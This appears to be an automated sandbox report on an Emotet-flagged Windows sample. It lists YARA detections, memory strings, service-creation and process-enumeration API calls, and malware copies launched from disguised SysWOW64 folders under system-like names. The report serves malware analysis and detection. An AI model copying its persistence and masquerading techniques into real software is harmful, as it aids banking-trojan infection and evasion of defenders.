                      Source: svchost.exe, 00000014.00000003.399566749.000002847D78E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.399526932.000002847D772000.00000004.00000001.sdmp | String found in binary or memory: https://www.roblox.com/info/privacy
                      Source: tokenbinding2.exe, 00000016.00000002.413591268.00000000010FA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exe | Code function: 1_2_00409E4C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe | Code function: 2_2_00409E4C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

                      E-Banking Fraud:

                      Yara detected Emotet
                      Source: Yara match | File source: 0000001C.00000002.442107298.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.464467088.0000000002971000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.428286473.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.439198093.00000000030A4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.419691301.0000000002B60000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.447921757.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.409946208.00000000020C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.468787553.00000000029E4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.470554430.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.493970869.0000000002AE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.446724023.0000000003274000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.482749716.00000000025B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.483313060.0000000002671000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.468454177.0000000002980000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.433437120.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.413932910.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001B.00000002.438746003.0000000001350000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.449294722.0000000001310000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000024.00000002.483058248.0000000002614000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.463773326.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243322939.00000000021E1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.409716178.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.429639515.0000000002CD4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.446019093.0000000001850000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.414052123.0000000002F14000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.477958707.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.492699981.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.417949677.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.410029176.00000000021D1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001A.00000002.429459440.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000020.00000002.465519796.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001F.00000002.464108385.0000000002914000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243267422.0000000002180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.243296865.00000000021C4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001E.00000002.449645390.0000000002D64000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001C.00000002.442504698.0000000002E94000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000022.00000002.478389759.0000000003214000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000017.00000002.420026339.0000000002BC4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000025.00000002.494214004.0000000002B44000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000016.00000002.412800025.0000000000401000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 32.2.jscript9.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b053f.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135052e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.218053f.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.2670000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.2970000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298052e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.21d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.218053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135279e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 27.2.COLORCNV.exe.135279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 34.2.wmvdspa.exe.31b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 26.2.execmodelproxy.exe.2c7279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b1f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 23.2.KBDHEB.exe.2b6279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.20c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 36.2.msvcr100_clr0400.exe.25b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 32.2.jscript9.exe.298279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 28.2.usp10.exe.2e3052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.20c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 37.2.catsrvut.exe.2ae279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.MCCSEngineShared.exe.28b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 30.2.msrd2x40.exe.131052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 22.2.tokenbinding2.exe.2eb279e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185052e.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.MV9tCJw8Xr.exe.21c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.KBDHEB.exe.5b1f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 29.2.KBDINTAM.exe.185052e.3.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A45800 Sleep,GetModuleFileNameW,PathFindFileNameW,PathFindExtensionW,OpenSCManagerW,OpenServiceW,DeleteService,CloseHandle,RegCreateKeyExW,RegDeleteValueW,CloseHandle,MoveFileW,ExitProcess,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile deleted: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.Identifier
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00421064
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041D27C
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004133A4
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0042045E
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0040B63B
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413778
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004159DC
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004209A0
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00411A80
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00419B00
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413B84
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412ED1
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041FF1C
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00421FE1
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00418FF3
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413FA4
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2AE3
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2C56
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02183E22
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02183F95
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00421064
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041D27C
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004133A4
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0042045E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0040B63B
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413778
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004159DC
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004209A0
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00411A80
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00419B00
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413B84
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00412ED1
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041FF1C
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00421FE1
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00418FF3
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413FA4
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2AE3
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2C56
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A569A5
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A571D9
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4922F
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A49A5B
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A464B7
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A494D9
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A48EBD
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A48E10
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A497A0
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00408180
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00401C70
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00407590
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB912E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB9D1E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00408180
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00401C70
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00407590
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6912E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B69D1E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00408180
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00401C70
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00407590
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7380E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C79D1E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7912E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00408180
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00401C70
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00407590
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135912E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01359D1E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: String function: 00A47960 appears 50 times
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: String function: 00412022 appears 77 times
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: String function: 00414554 appears 51 times
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: String function: 00412022 appears 77 times
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: String function: 00414554 appears 51 times
                      Source: MV9tCJw8Xr.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: MV9tCJw8Xr.exe, 00000001.00000000.226109151.0000000000434000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMinnesota's county attorneys want to give the state attorney general the authority vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244368599.0000000002A50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244368599.0000000002A50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244216934.0000000002950000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exeBinary or memory string: OriginalFilenameMinnesota's county attorneys want to give the state attorney general the authority vs MV9tCJw8Xr.exe
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: MV9tCJw8Xr.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@42/7@0/100
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D3657 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00403548 __EH_prolog3,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,SizeofResource,GetCurrentProcess,VirtualAllocExNuma,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00405060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1880:120:WilError_01
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile created: C:\Users\user~1\AppData\Local\Temp\UPDA7CE.tmp
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCommand line argument: LoaderLoader
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCommand line argument: LOADERLOADER
                      Source: MV9tCJw8Xr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: MV9tCJw8Xr.exeVirustotal: Detection: 66%
                      Source: MV9tCJw8Xr.exeMetadefender: Detection: 56%
                      Source: MV9tCJw8Xr.exeReversingLabs: Detection: 77%
                      Source: unknownProcess created: C:\Users\user\Desktop\MV9tCJw8Xr.exe 'C:\Users\user\Desktop\MV9tCJw8Xr.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\glu32\usp10.exe C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
